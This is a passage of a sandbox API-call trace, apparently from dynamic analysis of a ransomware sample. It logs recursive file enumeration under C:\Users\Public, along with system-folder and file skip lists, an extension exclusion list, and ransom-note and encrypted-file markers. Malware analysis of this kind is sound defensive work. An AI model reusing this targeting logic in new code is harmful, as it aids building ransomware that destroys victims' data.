nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0077.138] StrCmpW (psz1="Public", psz2=".") returned 1 [0077.138] StrCmpW (psz1="Public", psz2="..") returned 1 [0077.138] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0077.138] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0077.138] StrNCatW (in: psz1="C:\\Users\\", psz2="Public", cchMax=1042 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.138] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system32\\") returned 0x0 [0077.138] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.138] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system\\") returned 0x0 [0077.138] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\local\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\boot\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\perflogs\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\programdata\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\drivers\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\wsus\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="crypt_detect") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="cryptolocker") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="ransomware") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\WINDOWS") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.139] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files") returned 0x0 [0077.139] GetProcessHeap () returned 0xe30000 [0077.139] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0xec7e68 [0077.139] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.139] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0077.139] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0077.139] StrCmpW (psz1=".", psz2=".") returned 0 [0077.139] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.139] StrCmpW (psz1="..", psz2=".") returned 1 [0077.139] StrCmpW (psz1="..", psz2="..") returned 0 [0077.139] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0077.139] StrCmpW (psz1="AccountPictures", psz2=".") returned 1 [0077.140] StrCmpW (psz1="AccountPictures", psz2="..") returned 1 [0077.140] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.140] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.140] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="AccountPictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0077.140] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system32\\") returned 0x0 [0077.140] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\local\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.202] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\boot\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\perflogs\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\programdata\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\drivers\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\wsus\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="crypt_detect") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="cryptolocker") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="ransomware") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\WINDOWS") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.203] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files") returned 0x0 [0077.203] GetProcessHeap () returned 0xe30000 [0077.203] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xed41f8 [0077.203] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\AccountPictures", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0077.203] StrNCatW (in: psz1="C:\\Users\\Public\\AccountPictures", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0077.203] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0077.205] StrCmpW (psz1=".", psz2=".") returned 0 [0077.205] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.206] StrCmpW (psz1="..", psz2=".") returned 1 [0077.206] StrCmpW (psz1="..", psz2="..") returned 0 [0077.206] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.206] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.206] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.206] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0077.206] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0077.206] GetProcessHeap () returned 0xe30000 [0077.206] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.206] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0077.206] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0077.206] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0077.206] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.206] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.206] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0077.206] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0077.206] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.206] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0077.206] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.206] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="crypt_detect") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="cryptolocker") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="ransomware") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.207] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0077.207] GetProcessHeap () returned 0xe30000 [0077.207] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xed41f8 [0077.207] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0077.207] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0077.207] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0077.208] StrCmpW (psz1=".", psz2=".") returned 0 [0077.208] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.208] StrCmpW (psz1="..", psz2=".") returned 1 [0077.208] StrCmpW (psz1="..", psz2="..") returned 0 [0077.208] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0077.208] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2=".") returned 1 [0077.208] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2="..") returned 1 [0077.208] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0077.208] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0077.208] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Acrobat Reader DC.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0077.208] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0077.208] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootsect.bak") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="iconcache.db") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="thumbs.db") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransomware ") returned 1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransom ") returned 1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="debug.txt") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="boot.ini") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="desktop.ini") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="autorun.inf") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntuser.dat") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntldr") returned -1 [0077.208] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntdetect.com") returned -1 [0077.209] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootfont.bin") returned -1 [0077.209] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.209] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0077.209] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0077.209] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.209] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.209] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.209] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0077.209] StrCmpW (psz1="Google Chrome.lnk", psz2=".") returned 1 [0077.209] StrCmpW (psz1="Google Chrome.lnk", psz2="..") returned 1 [0077.209] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0077.209] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0077.209] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Google Chrome.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0077.209] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0077.209] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootsect.bak") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="iconcache.db") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="thumbs.db") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransomware ") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransom ") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="debug.txt") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="boot.ini") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="desktop.ini") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="autorun.inf") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntuser.dat") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntldr") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntdetect.com") returned -1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootfont.bin") returned 1 [0077.209] StrCmpIW (psz1="Google Chrome.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.209] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0077.210] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0077.210] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0077.210] StrCmpW (psz1="Mozilla Firefox.lnk", psz2=".") returned 1 [0077.210] StrCmpW (psz1="Mozilla Firefox.lnk", psz2="..") returned 1 [0077.210] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0077.210] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0077.210] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Mozilla Firefox.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0077.210] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0077.210] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootsect.bak") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="iconcache.db") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="thumbs.db") returned -1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransomware ") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransom ") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="debug.txt") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="boot.ini") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="desktop.ini") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="autorun.inf") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntuser.dat") returned -1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntldr") returned -1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntdetect.com") returned -1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootfont.bin") returned 1 [0077.210] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.210] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0077.210] StrStrIW 